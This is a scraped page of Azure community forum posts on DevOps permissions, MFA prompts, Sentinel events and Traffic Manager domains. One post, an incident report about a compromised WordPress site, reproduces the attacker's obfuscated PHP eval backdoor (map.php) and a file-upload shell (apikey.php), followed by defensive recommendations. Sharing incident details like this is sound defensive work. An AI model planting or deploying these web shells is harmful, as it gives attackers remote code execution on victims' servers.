CI/CD pipeline permissions
We have many DevOps projects; one per software project. Is it possible to add a user or a group organization-wide or collection-wide, so they can manage the build & release pipelines for every project, without adding them to each project explicitly? The project collection has a role for build administrators, but none for release administrators.
689 Views | 0 likes | 1 Comment

Users asked for 2nd MFA method
Hi there, starting today a couple of users reported that, seemingly out of the blue, they're being asked to configure a second method for their MFA setup. For example, if a user has configured to use the MSFT Authenticator app, he will be asked to provide an additional method. This doesn't seem to be widespread yet and we couldn't reproduce it thus far. Perhaps one of you knows what could be causing this. Thanks.
Solved | 2.3K Views | 0 likes | 3 Comments

Azure Bastion - News Comics
You are a Cloud lover? But you prefer Azure? Learning with fun? And most of all, you like establishing connections? (link removed by moderator) If you want to deep dive, do not hesitate to visit the official documentation on the Microsoft website: https://learn.microsoft.com/en-us/azure/bastion/bastion-overview (link removed by moderator)
1.9K Views | 1 like | 2 Comments

Azure Sentinel Webinar: Threat Hunting
Interested in going threat hunting with Azure Sentinel? Check out our upcoming webinar. Details and registration at https://aka.ms/AzureSentinelWebinar. The webinar will take place on Wednesday, September 18, 2019 at 09:00 PT / 12:00 ET / 16:00 GMT. Afterward, we will post recordings of the webinar at https://aka.ms/AzureSentinelRecordings. To stay informed about future webinars and other events, join our Security Community at https://aka.ms/SecurityCommunity.
888 Views | 1 like | 0 Comments

Meetup: Deep dive into the new Azure Sentinel service!
If you are based in London or will be there on October 23, our Azure Sentinel team will co-host a free “Deep dive into the new Azure Sentinel service” meetup in the month of October.
Meetup name: Deep dive into the new Azure Sentinel service
Cost: Free
Date: October 23rd, 2019
Time and Duration: 18:00 – 21:00
Location: The Microsoft Reactor London, 70 Wilson St. - London, UK
Registration: https://lnkd.in/gvRTgpz
There is a maximum capacity of 100 attendees, so if interested we suggest registering now.
1.3K Views | 1 like | 0 Comments

Security on Azure Devops Self Hosted agent
Hello, today I discovered that it is possible to deploy software from the pipeline directly on the agents without any kind of authentication. In my case I was able to deploy Docker directly on a self-hosted agent by just using a bash script in the pipeline. Is it possible to deny this kind of deployment on a self-hosted agent from the pipeline without impacting any other deployments, pipelines, or releases? From the security perspective, it poses a risk: someone who has access to the pipelines can deploy unwanted software on an agent.
Solved | 3.8K Views | 0 likes | 1 Comment

Malware Wordpress on Azure
Recently received a security alert on a WordPress webapp running on Azure:
1. There was a non-recognized authentication as admin user
2. The user uploaded a .zip file to the plugins folder that contained 2 files: map.php and apikey.php
3. The user performed a "test" through the "plugin"

Example of the code map.php:

    <?php $GLOBALS['_79565595_']=Array('str_' .'rot13','pack','st' .'rrev'); ?>
    <?php function _1178619035($i){$a=Array("jweyc","aeskoly","owhggiku","callbrhy","H*");return $a[$i];} ?>
    <?php function l__0($_0){return isset($_COOKIE[$_0])?$_COOKIE[$_0]:@$_POST[$_0];}$_1=l__0(_1178619035(0)) .l__0(_1178619035(1)) .l__0(_1178619035(2)) .l__0(_1178619035(3));if(!empty($_1)){$_1=$GLOBALS['_79565595_'][0](@$GLOBALS['_79565595_'][1](_1178619035(4),$GLOBALS['_79565595_'][2]($_1)));if(isset($_1)){@eval($_1);exit();}}

Example of code apikey.php:

    <?php
    /**
     * @package api key
     */
    /*
    Plugin Name: api key
    */
    if ("hello"==$_GET["test"]) { echo "testtrue"; }
    if(is_uploaded_file($_FILES["filename"]["tmp_name"])) {
        move_uploaded_file($_FILES["filename"]["tmp_name"],$_FILES["filename"]["name"]);
        echo "true";
    }

Image of the "Plugin" on the WordPress site:

Sucuri sent out an alert that the .zip file was uploaded to the site. At this point there is no easy way to find the affected files on a WordPress installation, even using tools like the online Sucuri scanner.

Recommendations:
- Enable Sucuri plugin on your WP
- Enable WAF v2 on your webapp
- If possible isolate your resource using App Service Environment
- Harden NSG(s)
- Perform an SSL test on your web app

If you have any other tip or recommendation please share!
1.9K Views | 0 likes | 2 Comments

How to redirect from one URL to another URL adding a security token?
I would like to know if there is any way with Azure Functions, Proxy... to redirect from one URL to another URL adding the accessToken. I'm looking for something like this: https://myexample.azuresite.net -> redirect + adding security -> https://www.myexample.com/oauthCallback.html?token= Could you help me? Regards
1.4K Views | 0 likes | 0 Comments

Executive Customer Meetings (Security) at Microsoft Ignite the Tour in Washington, DC
We are providing the opportunity for US GCC High customers to request on-site meetings with Microsoft Cloud Security General Manager, Asaf Kashi, during Microsoft Ignite the Tour in Washington, DC on Feb 6-7, 2020. Details and signup here!
962 Views | 0 likes | 1 Comment

one Traffic manager and multiple DNS mapping (pls need clarification on how security is ensured)
Hi Team,

I find it really strange how Azure Traffic Manager allows traffic from multiple custom domains by just adding a CNAME record of Traffic Manager to them, without enforcing any validation of DNS from the Azure end. Maybe I am wrong, but let me explain in detail.

Here's my setup:

Traffic Manager
\_____ App Gateway(East) & App Gateway(West)
\_WebApp (East) & \_WebApp(West)

An HA setup with applications in East & West. I bought a domain from GoDaddy and added a CNAME record pointing to Traffic Manager (pqr-tm.trafficmanager.net). I did no additional steps for domain validation from Azure. After the DNS propagation happened, the other day when I tried my custom domain (let's say pqr.com), it routed to my WebApp as expected as per the CNAME record.

Now, when I typed www.prq.com in https://digwebinterface.com I could see it resolved first to "traffic manager" (it clearly displays my Traffic Manager name), then to the Application Gateway DNS and then to the Application Gateway public IP.

Then my friend said, I'll do a trick, I'll get into your site without my notice. Here's what he did: he has a domain in Yahoo, let's say xyz.com. He opened his Yahoo account, went to DNS settings, and in the Forward URL option he put my Traffic Manager DNS name, which clearly appears in https://digwebinterface.com by just typing my website www.prq.com in it. To my surprise, within a minute, when he typed xyz.com in the browser, my WebApp started rendering the page. So, I thought, where is the security?

Here's my point: https://digwebinterface.com is publicly available; by typing the site name, anyone can get the Traffic Manager URL (if the setup includes it). Then, just by putting the CNAME in their forward URL, if they are able to map my site... where is the security? Or have I missed any step in Traffic Manager which binds my domain to it, so that if anyone else tries to point their domain to my Traffic Manager, it rejects them?

Pls help!! I have a strong feeling that there will be a tightening point which I am not aware of.
Pls guide, Gurus :)

Thanks,
Kiran
4.4K Views | 0 likes | 3 Comments